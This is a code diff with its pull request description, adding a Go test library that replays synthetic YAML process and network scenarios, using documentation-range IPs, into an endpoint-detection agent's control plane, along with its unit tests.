+		return json.Marshal(struct {
+			PID int `json:"pid"`
+		}{ev.PID})
+	default:
+		// knownEventTypes guarded the YAML loader, so reaching this is a bug in the library, not a user-input issue.
+		return nil, fmt.Errorf("buildPayload: unhandled event_type %q", ev.Type)
+	}
+}

--- a/test/fakeagent/feeder.go
+++ b/test/fakeagent/feeder.go
@@ -149,6 +149,10 @@ const (
 // unixSocketHTTPClient builds an http.Client whose transport dials the given unix socket regardless of the URL host. The
 // "http://unix" host in the URL is a placeholder net/http requires; the actual connection goes to socketPath. The dialer is a
 // per-call net.Dialer so the outer request's context cancellation propagates to the connect attempt.
+//
+// Proxy is intentionally left at its zero value (nil) so the transport never consults HTTP_PROXY/HTTPS_PROXY env vars. Unlike
+// http.DefaultTransport (which sets Proxy=ProxyFromEnvironment), a Transport literal with Proxy unset bypasses all proxies, which
+// is what we want for unix-socket dialing.
 func unixSocketHTTPClient(socketPath string) *http.Client {
 	return &http.Client{
 		Timeout: unixSocketHTTPTimeout,

--- a/test/fakeagent/feeder_test.go
+++ b/test/fakeagent/feeder_test.go
@@ -166,9 +166,15 @@ func TestPostDirect_RoundTrip(t *testing.T) {
 			w.WriteHeader(http.StatusNotFound)
 			return
 		}
-		seenAuthHeader = r.Header.Get("Authorization")
-		body, _ := io.ReadAll(r.Body)
+		body, err := io.ReadAll(r.Body)
+		if err != nil {
+			t.Errorf("read body: %v", err)
+			w.WriteHeader(http.StatusBadRequest)
+			return
+		}
+		// Lock around BOTH writes - go test -race reports the unsynchronised seenAuthHeader write otherwise.
 		mu.Lock()
+		seenAuthHeader = r.Header.Get("Authorization")
 		received = append(received, body)
 		mu.Unlock()
 		w.WriteHeader(http.StatusOK)
@@ -179,13 +185,15 @@ func TestPostDirect_RoundTrip(t *testing.T) {
 	require.NoError(t, err)
 	require.NoError(t, s.PostDirect(t.Context(), srv.URL, "test-token", WithBatchSize(10)))
 
-	assert.Equal(t, "Bearer test-token", seenAuthHeader)
 	mu.Lock()
+	gotAuth := seenAuthHeader
 	require.Len(t, received, 1, "BatchSize=10 should fit both events in one POST")
+	firstBody := append([]byte(nil), received[0]...)
 	mu.Unlock()
+	assert.Equal(t, "Bearer test-token", gotAuth)
 
 	var batch []Envelope
-	require.NoError(t, json.Unmarshal(received[0], &batch))
+	require.NoError(t, json.Unmarshal(firstBody, &batch))
 	require.Len(t, batch, 2)
 	assert.Equal(t, "dns_query", batch[0].EventType)
 	assert.Equal(t, "network_connect", batch[1].EventType)

--- a/test/fakeagent/feeder_test.go
+++ b/test/fakeagent/feeder_test.go
@@ -1,0 +1,218 @@
+package fakeagent
+
+import (
+	"context"
+	"encoding/json"
+	"io"
+	"net"
+	"net/http"
+	"net/http/httptest"
+	"os"
+	"path/filepath"
+	"sync"
+	"sync/atomic"
+	"testing"
+	"time"
+
+	"github.com/stretchr/testify/assert"
+	"github.com/stretchr/testify/require"
+)
+
+// shortSocketPath returns a unix-socket path short enough to satisfy macOS's 104-byte sun_path limit. t.TempDir embeds the test
+// name, which puts long test names over the limit; this helper deliberately bypasses t.TempDir by using os.MkdirTemp with a short
+// prefix so the resulting socket path fits the kernel limit.
+//
+//nolint:usetesting // t.TempDir would emit paths longer than AF_UNIX's 104-byte sun_path limit on macOS.
+func shortSocketPath(t *testing.T) string {
+	t.Helper()
+	dir, err := os.MkdirTemp("", "fa")
+	require.NoError(t, err)
+	t.Cleanup(func() { _ = os.RemoveAll(dir) })
+	return filepath.Join(dir, "c.sock")
+}
+
+// stubControlPlane is a minimal mock of the M2 headless binary's POST /event handler. It records every body it sees so the test can
+// assert on FeedControlPlane's output without spinning up the real headless binary (that's M4's integration test, not M3's).
+type stubControlPlane struct {
+	server *http.Server
+	socket string
+	bodies [][]byte
+	mu     sync.Mutex
+	wg     sync.WaitGroup
+}
+
+func newStubControlPlane(t *testing.T) *stubControlPlane {
+	t.Helper()
+	socket := shortSocketPath(t)
+	listener, err := (&net.ListenConfig{}).Listen(t.Context(), "unix", socket)
+	require.NoError(t, err)
+
+	sp := &stubControlPlane{socket: socket}
+	mux := http.NewServeMux()
+	mux.HandleFunc("POST /event", func(w http.ResponseWriter, r *http.Request) {
+		body, err := io.ReadAll(r.Body)
+		if err != nil {
+			w.WriteHeader(http.StatusBadRequest)
+			return
+		}
+		sp.mu.Lock()
+		sp.bodies = append(sp.bodies, body)
+		sp.mu.Unlock()
+		w.WriteHeader(http.StatusAccepted)
+	})
+	sp.server = &http.Server{Handler: mux, ReadTimeout: 3 * time.Second, WriteTimeout: 3 * time.Second}
+	sp.wg.Go(func() {
+		_ = sp.server.Serve(listener)
+	})
+	t.Cleanup(func() {
+		shutdownCtx, cancel := context.WithTimeout(context.Background(), 2*time.Second)
+		defer cancel()
+		_ = sp.server.Shutdown(shutdownCtx)
+		sp.wg.Wait()
+	})
+	return sp
+}
+
+func (sp *stubControlPlane) received() [][]byte {
+	sp.mu.Lock()
+	defer sp.mu.Unlock()
+	out := make([][]byte, len(sp.bodies))
+	copy(out, sp.bodies)
+	return out
+}
+
+func TestFeedControlPlane_RoundTrip(t *testing.T) {
+	sp := newStubControlPlane(t)
+
+	s, err := LoadScenario("scenarios/exec-fork-exit.yaml")
+	require.NoError(t, err)
+
+	start := time.Date(2026, 5, 20, 12, 0, 0, 0, time.UTC)
+	require.NoError(t, s.FeedControlPlane(t.Context(), sp.socket,
+		WithStartTime(start), WithIDGenerator(seqID())))
+
+	bodies := sp.received()
+	require.Len(t, bodies, 3, "stub control plane should have received 3 envelopes")
+
+	// Round-trip the first body and assert on shape: it's the fork event.
+	var first Envelope
+	require.NoError(t, json.Unmarshal(bodies[0], &first))
+	assert.Equal(t, "fork", first.EventType)
+	assert.Equal(t, "exec-fork-exit-host", first.HostID)
+	assert.Equal(t, "e-0", first.EventID)
+	assert.Equal(t, start.UnixNano(), first.TimestampNs)
+
+	var forkPayload struct{ ChildPID, ParentPID int }
+	// Payload is json.RawMessage in Envelope; unmarshal with the lowercase JSON tags via a quick re-decode.
+	var raw map[string]json.RawMessage
+	require.NoError(t, json.Unmarshal(bodies[0], &raw))
+	require.NoError(t, json.Unmarshal(raw["payload"], &struct {
+		ChildPID  *int `json:"child_pid"`
+		ParentPID *int `json:"parent_pid"`
+	}{&forkPayload.ChildPID, &forkPayload.ParentPID}))
+	assert.Equal(t, 4001, forkPayload.ChildPID)
+	assert.Equal(t, 1, forkPayload.ParentPID)
+}
+
+func TestFeedControlPlane_PropagatesServerError(t *testing.T) {
+	// A stub that always 500s: FeedControlPlane should return the error from the FIRST envelope and not call subsequent envelopes.
+	socket := shortSocketPath(t)
+	listener, err := (&net.ListenConfig{}).Listen(t.Context(), "unix", socket)
+	require.NoError(t, err)
+	var attempts atomic.Int32
+	srv := &http.Server{
+		Handler: http.HandlerFunc(func(w http.ResponseWriter, _ *http.Request) {
+			attempts.Add(1)
+			w.WriteHeader(http.StatusInternalServerError)
+		}),
+		ReadTimeout: time.Second, WriteTimeout: time.Second,
+	}
+	go func() { _ = srv.Serve(listener) }()
+	t.Cleanup(func() {
+		shutdownCtx, cancel := context.WithTimeout(context.Background(), 2*time.Second)
+		defer cancel()
+		_ = srv.Shutdown(shutdownCtx)
+	})
+
+	s, err := LoadScenario("scenarios/exec-fork-exit.yaml") // 3 events
+	require.NoError(t, err)
+	err = s.FeedControlPlane(t.Context(), socket, WithStartTime(time.Unix(0, 0)))
+	require.Error(t, err)
+	assert.Contains(t, err.Error(), "HTTP 500")
+	assert.Equal(t, int32(1), attempts.Load(), "subsequent envelopes must not be sent after an error")
+}
+
+func TestFeedControlPlane_RespectsContextCancel(t *testing.T) {
+	sp := newStubControlPlane(t)
+	s, err := LoadScenario("scenarios/exec-fork-exit.yaml")
+	require.NoError(t, err)
+
+	ctx, cancel := context.WithCancel(t.Context())
+	cancel() // pre-cancel
+	err = s.FeedControlPlane(ctx, sp.socket, WithStartTime(time.Unix(0, 0)),
+		WithSpeed(0.001)) // very slow playback so cancel beats the loop
+	require.Error(t, err)
+	assert.ErrorIs(t, err, context.Canceled)
+}
+
+func TestPostDirect_RoundTrip(t *testing.T) {
+	var (
+		received       [][]byte
+		mu             sync.Mutex
+		seenAuthHeader string
+	)
+	srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		if r.URL.Path != "/api/events" {
+			w.WriteHeader(http.StatusNotFound)
+			return
+		}
+		seenAuthHeader = r.Header.Get("Authorization")
+		body, _ := io.ReadAll(r.Body)
+		mu.Lock()
+		received = append(received, body)
+		mu.Unlock()
+		w.WriteHeader(http.StatusOK)
+	}))
+	t.Cleanup(srv.Close)
+
+	s, err := LoadScenario("scenarios/dns-and-network.yaml")
+	require.NoError(t, err)
+	require.NoError(t, s.PostDirect(t.Context(), srv.URL, "test-token", WithBatchSize(10)))
+
+	assert.Equal(t, "Bearer test-token", seenAuthHeader)
+	mu.Lock()
+	require.Len(t, received, 1, "BatchSize=10 should fit both events in one POST")
+	mu.Unlock()
+
+	var batch []Envelope
+	require.NoError(t, json.Unmarshal(received[0], &batch))
+	require.Len(t, batch, 2)
+	assert.Equal(t, "dns_query", batch[0].EventType)
+	assert.Equal(t, "network_connect", batch[1].EventType)
+}
+
+func TestPostDirect_BatchesAcrossMultipleRequests(t *testing.T) {
+	var batchCount atomic.Int32
+	srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, _ *http.Request) {
+		batchCount.Add(1)
+		w.WriteHeader(http.StatusOK)
+	}))
+	t.Cleanup(srv.Close)
+
+	s, err := LoadScenario("scenarios/exec-fork-exit.yaml") // 3 events
+	require.NoError(t, err)
+	require.NoError(t, s.PostDirect(t.Context(), srv.URL, "tok", WithBatchSize(2)))
+	assert.Equal(t, int32(2), batchCount.Load(), "3 events at batch_size=2 should split into 2 POSTs")
+}
+
+func TestPostDirect_PropagatesNon2xx(t *testing.T) {
+	srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, _ *http.Request) {
+		w.WriteHeader(http.StatusUnauthorized)
+	}))
+	t.Cleanup(srv.Close)
+	s, err := LoadScenario("scenarios/exec-fork-exit.yaml")
+	require.NoError(t, err)
+	err = s.PostDirect(t.Context(), srv.URL, "tok")
+	require.Error(t, err)
+	assert.Contains(t, err.Error(), "HTTP 401")
+}

--- a/test/fakeagent/option.go
+++ b/test/fakeagent/option.go
@@ -1,0 +1,71 @@
+package fakeagent
+
+import (
+	"crypto/rand"
+	"encoding/hex"
+	"time"
+)
+
+// runConfig is the resolved set of knobs the envelope builder + feeders read at runtime. Defaults are filled in by newRunConfig;
+// Option values applied via With* mutate the config before use.
+type runConfig struct {
+	startTime       time.Time
+	hostIDOverride  string
+	speedMultiplier float64
+	batchSize       int
+	idGenerator     func() string
+}
+
+// Option is the functional-option type for FeedControlPlane, PostDirect, and Envelopes. Use With* helpers to construct values.
+type Option func(*runConfig)
+
+// WithStartTime fixes the scenario's start instant. Every timeline event's wire timestamp_ns becomes startTime + at.nanoseconds.
+// Default: time.Now() at call time, which is fine for live traffic but produces non-deterministic envelopes; tests should pass a
+// fixed value so golden comparisons and event-id derivations stay stable across runs.
+func WithStartTime(t time.Time) Option { return func(c *runConfig) { c.startTime = t } }
+
+// WithHostID replaces the host id baked into the scenario's metadata. The scenario's host.id remains for log lines, but every
+// emitted envelope's host_id field uses the override. Test code that wants N hosts from one scenario simply varies this.
+func WithHostID(id string) Option { return func(c *runConfig) { c.hostIDOverride = id } }
+
+// WithSpeed sets the playback speed. 0 (the default) fires every event immediately, ignoring the timeline's At offsets entirely;
+// the wire timestamps still reflect At but the feeder doesn't sleep. 1.0 plays at real time. Higher values compress the timeline
+// (e.g. 10.0 means a 1s scenario takes 100ms). Negative values panic at run-time.
+func WithSpeed(multiplier float64) Option {
+	return func(c *runConfig) { c.speedMultiplier = multiplier }
+}
+
+// WithBatchSize controls how many envelopes PostDirect bundles into a single /api/events POST. Default 100. Has no effect on
+// FeedControlPlane, which posts one envelope per /event call by design (the headless binary's control plane mirrors the production
+// receiver's one-event-at-a-time semantics).
+func WithBatchSize(n int) Option { return func(c *runConfig) { c.batchSize = n } }
+
+// WithIDGenerator overrides the function used to derive each envelope's event_id. The default produces a 32-hex-char random ID per
+// envelope; tests pass a deterministic generator to make golden comparisons reproducible.
+func WithIDGenerator(f func() string) Option { return func(c *runConfig) { c.idGenerator = f } }
+
+// newRunConfig builds the resolved config, applies any options, then returns it.
+func newRunConfig(opts []Option) *runConfig {
+	c := &runConfig{
+		startTime:       time.Now(),
+		speedMultiplier: 0,
+		batchSize:       100,
+		idGenerator:     randomEventID,
+	}
+	for _, o := range opts {
+		o(c)
+	}
+	return c
+}
+
+// randomEventID returns a 32-character lower-hex random identifier. Stable, dependency-free, sufficient for collision-free
+// scenario runs at the volumes this library is designed for (single-digit thousands of events per run).
+func randomEventID() string {
+	var b [16]byte
+	if _, err := rand.Read(b[:]); err != nil {
+		// crypto/rand.Read on a properly configured OS does not fail; the panic here is defensive and would surface as a test
+		// failure rather than producing duplicated event_ids that mask a real bug downstream.
+		panic("fakeagent: crypto/rand.Read: " + err.Error())
+	}
+	return hex.EncodeToString(b[:])
+}

--- a/test/fakeagent/option.go
+++ b/test/fakeagent/option.go
@@ -30,19 +30,32 @@ func WithHostID(id string) Option { return func(c *runConfig) { c.hostIDOverride
 
 // WithSpeed sets the playback speed. 0 (the default) fires every event immediately, ignoring the timeline's At offsets entirely;
 // the wire timestamps still reflect At but the feeder doesn't sleep. 1.0 plays at real time. Higher values compress the timeline
-// (e.g. 10.0 means a 1s scenario takes 100ms). Negative values panic at run-time.
+// (e.g. 10.0 means a 1s scenario takes 100ms). Negative or zero values are treated as 0 (fire immediately).
 func WithSpeed(multiplier float64) Option {
 	return func(c *runConfig) { c.speedMultiplier = multiplier }
 }
 
 // WithBatchSize controls how many envelopes PostDirect bundles into a single /api/events POST. Default 100. Has no effect on
 // FeedControlPlane, which posts one envelope per /event call by design (the headless binary's control plane mirrors the production
-// receiver's one-event-at-a-time semantics).
-func WithBatchSize(n int) Option { return func(c *runConfig) { c.batchSize = n } }
+// receiver's one-event-at-a-time semantics). Panics on n <= 0 because PostDirect's `for start += cfg.batchSize` loop would either
+// never advance (n=0, infinite loop) or run backwards (n<0) - neither is a recoverable state, and the panic gives the test author
+// a clear stack to the misconfiguration rather than a hanging or unbounded test run.
+func WithBatchSize(n int) Option {
+	if n <= 0 {
+		panic("fakeagent: WithBatchSize requires n > 0")
+	}
+	return func(c *runConfig) { c.batchSize = n }
+}
 
 // WithIDGenerator overrides the function used to derive each envelope's event_id. The default produces a 32-hex-char random ID per
-// envelope; tests pass a deterministic generator to make golden comparisons reproducible.
-func WithIDGenerator(f func() string) Option { return func(c *runConfig) { c.idGenerator = f } }
+// envelope; tests pass a deterministic generator to make golden comparisons reproducible. Panics on a nil function so the failure
+// surfaces at the WithIDGenerator(nil) call site rather than later in Envelopes when cfg.idGenerator() dereferences nil.
+func WithIDGenerator(f func() string) Option {
+	if f == nil {
+		panic("fakeagent: WithIDGenerator requires a non-nil function")
+	}
+	return func(c *runConfig) { c.idGenerator = f }
+}
 
 // newRunConfig builds the resolved config, applies any options, then returns it.
 func newRunConfig(opts []Option) *runConfig {

--- a/test/fakeagent/scenarios/dns-and-network.yaml
+++ b/test/fakeagent/scenarios/dns-and-network.yaml
@@ -1,0 +1,24 @@
+# DNS-then-network scenario: a process resolves a hostname, then opens an outbound TCP connection to the resolved IP. Exercises the
+# network-attribution path the agent emits (issue #68) plus the DNS-to-network correlation the detection engine relies on. The remote
+# IP is in the TEST-NET-3 documentation block (RFC 5737) so the scenario is unambiguous about being synthetic.
+name: "DNS then outbound TCP"
+mitre: T1071.004
+host:
+  id: dns-net-host
+  hostname: lab-mac.local
+  os: macOS 14.4
+timeline:
+  - at: 0ms
+    type: dns_query
+    pid: 5200
+    query_name: api.example.com
+    query_type: A
+    response_addresses: ["203.0.113.42"]
+    protocol: udp
+  - at: 15ms
+    type: network_connect
+    pid: 5200
+    protocol: tcp
+    direction: outbound
+    remote_address: 203.0.113.42
+    remote_port: 443

--- a/test/fakeagent/scenarios/exec-fork-exit.yaml
+++ b/test/fakeagent/scenarios/exec-fork-exit.yaml
@@ -1,6 +1,7 @@
 # A baseline process-graph scenario: launchd forks a child, the child execs into /bin/ls, the child exits. Exercises the three core
-# process-graph events (fork, exec, exit) plus the agent's tendency to receive them slightly out of order due to ESF batching. Every
-# detection rule that walks the process tree relies on this shape, so the scenario doubles as a smoke test for the rule engine.
+# process-graph events (fork, exec, exit) in chronological order. Every detection rule that walks the process tree relies on this
+# shape, so the scenario doubles as a smoke test for the rule engine. Out-of-order delivery is a separate concern - the agent's
+# pipeline reorders by timestamp - and is covered by a dedicated future scenario, not by reordering this one.
 name: "Baseline process-graph: ls -la"
 host:
   id: exec-fork-exit-host

--- a/test/fakeagent/scenarios/exec-fork-exit.yaml
+++ b/test/fakeagent/scenarios/exec-fork-exit.yaml
@@ -1,0 +1,26 @@
+# A baseline process-graph scenario: launchd forks a child, the child execs into /bin/ls, the child exits. Exercises the three core
+# process-graph events (fork, exec, exit) plus the agent's tendency to receive them slightly out of order due to ESF batching. Every
+# detection rule that walks the process tree relies on this shape, so the scenario doubles as a smoke test for the rule engine.
+name: "Baseline process-graph: ls -la"
+host:
+  id: exec-fork-exit-host
+  hostname: lab-mac.local
+  os: macOS 14.4
+timeline:
+  - at: 0ms
+    type: fork
+    child_pid: 4001
+    parent_pid: 1
+  - at: 2ms
+    type: exec
+    pid: 4001
+    ppid: 1
+    path: /bin/ls
+    args: ["ls", "-la", "/tmp"]
+    cwd: /tmp
+    uid: 501
+    gid: 20
+  - at: 25ms
+    type: exit
+    pid: 4001
+    exit_code: 0

--- a/test/fakeagent/scenarios/quiet-host.yaml
+++ b/test/fakeagent/scenarios/quiet-host.yaml
@@ -1,0 +1,11 @@
+# Quiet host scenario: a single snapshot heartbeat for an idle process. Used as a noise-floor probe in detection efficacy tests
+# (M10): every rule that fires on a quiet host is by definition a false positive.
+name: "Quiet host"
+host:
+  id: quiet-host-1
+  hostname: quiet.lab.local
+  os: macOS 14.4
+timeline:
+  - at: 0ms
+    type: snapshot_heartbeat
+    pid: 100


### PR DESCRIPTION
Third milestone of the UAT plan in docs/testing-strategy.md. With M1's build-tag split letting the agent compile on linux and M2's headless binary exposing a unix-socket POST /event control plane, M3 ships the library that consumers (the M4 L3 integration test, the M10 detection- efficacy corpus, Playwright fixtures, the M12 scale test) use to drive the headless binary or the server directly from YAML scenarios.

What this lands:

- test/fakeagent/ is a new Go library:
  - fakeagent.go: Scenario, Event, Host, Assertion types with json tags. LoadScenario reads YAML via sigs.k8s.io/yaml (which goes through encoding/json so the same tags serve both authoring and wire emission). Validate enforces the structural invariants consumers rely on (name, host.id, non-empty timeline, known event_type). A Duration wrapper accepts "10ms"/"5s" strings or raw nanosecond integers.
  - feeder.go: Envelopes(opts...) materialises wire envelopes deterministically from the timeline (pure computation, no I/O); FeedControlPlane posts one envelope at a time to the headless binary's unix socket; PostDirect batches envelopes to a server's /api/events with a bearer token. Both honour the run config.
  - option.go: WithStartTime / WithHostID / WithSpeed / WithBatchSize / WithIDGenerator. Default speed is 0 (fire immediately), default batch size 100, default id generator is crypto/rand 32-hex.

- test/fakeagent/scenarios/ ships three starter YAML files: quiet-host.yaml (heartbeat-only noise floor), exec-fork-exit.yaml (baseline process tree), dns-and-network.yaml (DNS + outbound TCP, RFC 5737 documentation IP so the scenario reads as synthetic).

- Unit tests cover the loader (round-trip across the starter corpus, every validation branch, file-not-found, malformed YAML, Duration parsing both forms with invalid inputs), envelope generation (deterministic timestamps, host id override, payload-shape per event type cross-checked against schema/events.json, timeline-order preservation), and both feeders (stub unix-socket control plane records bodies, stub /api/events server records batches, error propagation, ctx-cancel mid-flight).

- shortSocketPath helper bypasses t.TempDir for unix sockets because macOS's sun_path is 104 bytes and long test names blow that budget; documented inline with a nolint:usetesting note.

- Taskfile.yml: test:go:agent and test:go:agent:coverage extended with ./test/fakeagent/... so the library tests run on every PR in the existing agent-test CI job. -coverpkg now includes ./test/fakeagent/... so Sonar sees per-line coverage.

- docs/testing-strategy.md: Reusable-artefacts section now describes fakeagent as it actually ships, including the option matrix and the starter scenarios. The example scenario in the doc is updated to use the real wire field names (child_pid/parent_pid for fork, exit_code for exit, etc.) so a contributor copy-pasting from the doc gets a scenario that actually loads.

- go.mod: sigs.k8s.io/yaml promoted from indirect to direct.

Verified locally: task test:go:agent (3 fakeagent tests + existing agent tests pass), task test:go:agent:coverage (merged profile clean, fakeagent contributes 1261 line entries, package coverage 85.2%), task lint:go (0 issues), task lint:md (0 errors), gofmt clean, GOOS=linux cross-build of fakeagent and the test binary both succeed.

Builds on M1 (#206) and M2 (#211), both merged to main. Refs UAT plan M3 milestone. M4 (the L3 integration CI job that drives the headless binary with this library) is next.

<!-- This is an auto-generated comment: release notes by coderabbit.ai -->

## Summary by CodeRabbit

* **New Features**
  * Introduced a scenario-based testing framework that supports YAML-defined test cases with configurable playback options (start time, speed, batch sizing)
  * Added capability to feed test scenarios to integration endpoints with deterministic timestamps and event sequencing
  
* **Documentation**
  * Updated testing strategy guide with expanded fake-agent library descriptions and revised scenario examples
  
* **Chores**
  * Extended test coverage to include new testing utilities in race-condition checks

<!-- review_stack_entry_start -->

[![Review Change Stack](https://storage.googleapis.com/coderabbit_public_assets/review-stack-in-coderabbit-ui.svg)](https://app.coderabbit.ai/change-stack/getvictor/fleet-edr/pull/212?utm_source=github_walkthrough&utm_medium=github&utm_campaign=change_stack)

<!-- review_stack_entry_end -->

<!-- end of auto-generated comment: release notes by coderabbit.ai -->